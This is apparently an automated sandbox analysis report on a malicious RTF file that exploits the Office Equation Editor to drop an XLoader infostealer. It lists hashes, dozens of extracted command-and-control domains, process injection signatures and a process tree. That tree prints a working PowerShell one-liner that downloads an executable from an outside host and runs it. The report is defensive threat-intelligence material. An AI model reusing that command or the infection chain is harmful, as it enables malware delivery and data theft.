Analysis
max time kernel: 150s
max time network: 91s
platform: windows7_x64
resource: win7v20201028
submitted: 04-03-2021 17:47
Static task: static1
Behavioral task: behavioral1
  Sample: SecuriteInfo.com.Exploit.RTF-ObfsStrm.Gen.675.18581.rtf
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: SecuriteInfo.com.Exploit.RTF-ObfsStrm.Gen.675.18581.rtf
  Resource: win10v20201028
General
Target: SecuriteInfo.com.Exploit.RTF-ObfsStrm.Gen.675.18581.rtf
Size: 267KB
MD5: 174339ee0b1d50af956d16c7608a787e
SHA1: 70f7dda70f239b16afcd1e7818075237c53abbc5
SHA256: 9e9f12d14bd6918e39116f6a1c8017ecf3cd93a37c760b67175c0332d429526e
SHA512: f7a7c1ff8cb032582f8695cb927e1429d8b355547b67a96dfb8834fd43e8891bd6a660c70935c910ba0ee2cb1f20a8d83bc42aab04db310b85fbadab8897527a
Malware Config
Extracted
http://bppgov.ng/gotv.exe
Extracted
xloader
http://www.pardsoda.com/w25t/
nowayinlocksmith.com
bookaprovider.com
joybirder.com
decoracerrado.com
preciousmonments.com
96kixx.com
parentseducationalco-op.com
cbdandbtc.com
santanadeliciasymas.com
finecharlottehomes.com
themanibox.com
backupasia.com
buffalodetailstore.com
iprdo.com
croce-komeko.com
bluechipsgroup.company
truyencow.com
globalism.online
oicrafts.com
naturalawakeningsprograms.com
findsurreydeltahomes.com
dressing.cat
tavazonfund.com
defichair.com
str8firekennels.com
lenskart.site
salahdinortho.com
3tothrive.com
watchsdeals.com
plethoracosmetics.net
kentland33store.com
abbaszawawi.com
resepmasakankita.info
tomschoices.net
xn--livezoty-bpb.com
sixteen3handscottages.com
elliesuesews.com
mylordismyshepherd.com
chaing-list.xyz
asesorgrupovivir.com
kicked2theothercurb.com
nemahealthcare.com
allsalesvinyl.net
crystal-beachclub.com
mprose.net
chooseone.xyz
glasgowldn2009.com
getyourquan.com
nailpolishng.com
myeunoiateacompany.com
tobaccomangalt.com
honggedichan.com
beleafagency.com
zhonghuixingyue.com
fitnessworldexample.com
skdocm.club
buygenerations.com
aressdsg.com
auberge-escotais.com
claritycleaningsystems.com
riru300.com
aserchofalltrades.com
blackholidayco.com
bookclubspeakers.com
Signatures

Xloader Payload (2 IoCs)
Processes:
resource | yara_rule
behavioral1/memory/1168-54-0x0000000000401000-0x0000000000541000-memory.dmp | xloader
behavioral1/memory/368-60-0x0000000000080000-0x00000000000A9000-memory.dmp | xloader

Blocklisted process makes network request (1 IoC)
Processes:
flow | pid | process
7 | 368 | powershell.exe

Executes dropped EXE (1 IoC)
Processes:
pid | process
604 | Wb.exe

Loads dropped DLL (7 IoCs)
Processes:
pid | process
368 | powershell.exe (5 entries)
604 | Wb.exe
1168 | Wb.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Drops file in System32 directory (2 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\SysWOW64\sackcloths | Wb.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (3 IoCs)
Processes:
pid | process
604 | Wb.exe
1168 | Wb.exe (2 entries)

Suspicious use of SetThreadContext (3 IoCs)
Processes:
description | pid | process | target process
PID 604 set thread context of 1168 | 604 | Wb.exe | Wb.exe
PID 1168 set thread context of 1276 | 1168 | Wb.exe | Explorer.EXE
PID 368 set thread context of 1276 | 368 | systray.exe | Explorer.EXE

Drops file in Windows directory (1 IoC)
Processes:
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor (1 TTP, 1 IoC)
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

Modifies Internet Explorer settings
Processes:
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
pid | process
1924 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (28 IoCs)
Processes:
pid | process
368 | powershell.exe (2 entries)
1168 | Wb.exe (2 entries)
368 | systray.exe (24 entries)

Suspicious behavior: MapViewOfSection (6 IoCs)
Processes:
pid | process
604 | Wb.exe
1168 | Wb.exe (3 entries)
368 | systray.exe (2 entries)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 368 | powershell.exe
Token: SeDebugPrivilege | 1168 | Wb.exe
Token: SeDebugPrivilege | 368 | systray.exe

Suspicious use of FindShellTrayWindow (4 IoCs)
Processes:
pid | process
1276 | Explorer.EXE (4 entries)

Suspicious use of SendNotifyMessage (4 IoCs)
Processes:
pid | process
1276 | Explorer.EXE (4 entries)

Suspicious use of SetWindowsHookEx (3 IoCs)
Processes:
pid | process
1924 | WINWORD.EXE (2 entries)
604 | Wb.exe

Suspicious use of WriteProcessMemory (29 IoCs)
Processes:
description | pid | process | target process
PID 1924 wrote to memory of 1972 | 1924 | WINWORD.EXE | splwow64.exe (4 entries)
PID 1724 wrote to memory of 1668 | 1724 | EQNEDT32.EXE | cmd.exe (4 entries)
PID 1668 wrote to memory of 368 | 1668 | cmd.exe | powershell.exe (4 entries)
PID 368 wrote to memory of 604 | 368 | powershell.exe | Wb.exe (4 entries)
PID 604 wrote to memory of 1168 | 604 | Wb.exe | Wb.exe (5 entries)
PID 1276 wrote to memory of 368 | 1276 | Explorer.EXE | systray.exe (4 entries)
PID 368 wrote to memory of 1740 | 368 | systray.exe | cmd.exe (4 entries)
Processes
(process tree; indentation shows parent/child depth)

C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

  C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.RTF-ObfsStrm.Gen.675.18581.rtf"
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Windows\splwow64.exe
      command line: C:\Windows\splwow64.exe 12288

  C:\Windows\SysWOW64\systray.exe
    command line: "C:\Windows\SysWOW64\systray.exe"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
      command line: /c del "C:\Users\Admin\AppData\Local\Temp\Wb.exe"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe
    command line: cmd.exe /c PowerShell "try{$xcHZX=$env:temp+'\Wb.exe'; (New-Object System.Net.WebClient).DownloadFile( 'http://bppgov.ng/gotv.exe', $xcHZX);(New-Object -com Shell.Application).ShellExecute( $xcHZX);}catch{}"
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: PowerShell "try{$xcHZX=$env:temp+'\Wb.exe'; (New-Object System.Net.WebClient).DownloadFile( 'http://bppgov.ng/gotv.exe', $xcHZX);(New-Object -com Shell.Application).ShellExecute( $xcHZX);}catch{}"
      - Blocklisted process makes network request
      - Loads dropped DLL
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Local\Temp\Wb.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\Wb.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Drops file in System32 directory
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\Wb.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\Wb.exe"
          - Loads dropped DLL
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\Wb.exe
MD5: 1da73d4931cd6893f7b9fc765225a62d
SHA1: cdc4992d5e425628b1c12c51d64a9105824bacc5
SHA256: 12e42bff4fa377032623342ac1f23a5c87225a40ef8b900cbb06ae4bd203864d
SHA512: fe6d7693e80890b3da7a27d37630d48a4de919b53a8532496fe9c4b66665dde605a46f71d42e228d83fa8d3c92aaadc5a36b50e479f450742ab8a06589820a18

\Users\Admin\AppData\Local\Temp\Wb.exe
MD5: 1da73d4931cd6893f7b9fc765225a62d
SHA1: cdc4992d5e425628b1c12c51d64a9105824bacc5
SHA256: 12e42bff4fa377032623342ac1f23a5c87225a40ef8b900cbb06ae4bd203864d
SHA512: fe6d7693e80890b3da7a27d37630d48a4de919b53a8532496fe9c4b66665dde605a46f71d42e228d83fa8d3c92aaadc5a36b50e479f450742ab8a06589820a18

memory/368-14-0x0000000004950000-0x0000000004951000-memory.dmp  Filesize: 4KB
memory/368-27-0x0000000006230000-0x0000000006231000-memory.dmp  Filesize: 4KB
memory/368-63-0x0000000000A00000-0x0000000000A8F000-memory.dmp  Filesize: 572KB
memory/368-15-0x0000000004952000-0x0000000004953000-memory.dmp  Filesize: 4KB
memory/368-16-0x0000000001250000-0x0000000001251000-memory.dmp  Filesize: 4KB
memory/368-17-0x0000000005240000-0x0000000005241000-memory.dmp  Filesize: 4KB
memory/368-19-0x000000007EF30000-0x000000007EF31000-memory.dmp  Filesize: 4KB
memory/368-21-0x0000000006080000-0x0000000006081000-memory.dmp  Filesize: 4KB
memory/368-26-0x00000000060C0000-0x00000000060C1000-memory.dmp  Filesize: 4KB
memory/368-58-0x0000000000000000-mapping.dmp
memory/368-34-0x00000000061F0000-0x00000000061F1000-memory.dmp  Filesize: 4KB
memory/368-35-0x00000000062D0000-0x00000000062D1000-memory.dmp  Filesize: 4KB
memory/368-12-0x0000000000E60000-0x0000000000E61000-memory.dmp  Filesize: 4KB
memory/368-11-0x000000006B2A0000-0x000000006B98E000-memory.dmp  Filesize: 6.9MB
memory/368-9-0x0000000000000000-mapping.dmp
memory/368-61-0x00000000020F0000-0x00000000023F3000-memory.dmp  Filesize: 3.0MB
memory/368-60-0x0000000000080000-0x00000000000A9000-memory.dmp  Filesize: 164KB
memory/368-13-0x0000000004990000-0x0000000004991000-memory.dmp  Filesize: 4KB
memory/368-59-0x0000000000CE0000-0x0000000000CE5000-memory.dmp  Filesize: 20KB
memory/604-41-0x0000000000000000-mapping.dmp
memory/604-45-0x0000000000430000-0x000000000043B000-memory.dmp  Filesize: 44KB
memory/1168-55-0x000000001E8D0000-0x000000001EBD3000-memory.dmp  Filesize: 3.0MB
memory/1168-56-0x000000001E770000-0x000000001E780000-memory.dmp  Filesize: 64KB
memory/1168-51-0x00000000001B0000-0x00000000002B0000-memory.dmp  Filesize: 1024KB
memory/1168-54-0x0000000000401000-0x0000000000541000-memory.dmp  Filesize: 1.2MB
memory/1168-49-0x00000000004018E4-mapping.dmp
memory/1276-57-0x0000000003C40000-0x0000000003D7B000-memory.dmp  Filesize: 1.2MB
memory/1668-8-0x0000000000000000-mapping.dmp
memory/1724-7-0x0000000075AE1000-0x0000000075AE3000-memory.dmp  Filesize: 8KB
memory/1736-53-0x000007FEF6680000-0x000007FEF68FA000-memory.dmp  Filesize: 2.5MB
memory/1740-62-0x0000000000000000-mapping.dmp
memory/1924-4-0x000000005FFF0000-0x0000000060000000-memory.dmp  Filesize: 64KB
memory/1924-3-0x00000000705A1000-0x00000000705A3000-memory.dmp  Filesize: 8KB
memory/1924-2-0x0000000072B21000-0x0000000072B24000-memory.dmp  Filesize: 12KB
memory/1972-6-0x000007FEFC021000-0x000007FEFC023000-memory.dmp  Filesize: 8KB
memory/1972-5-0x0000000000000000-mapping.dmp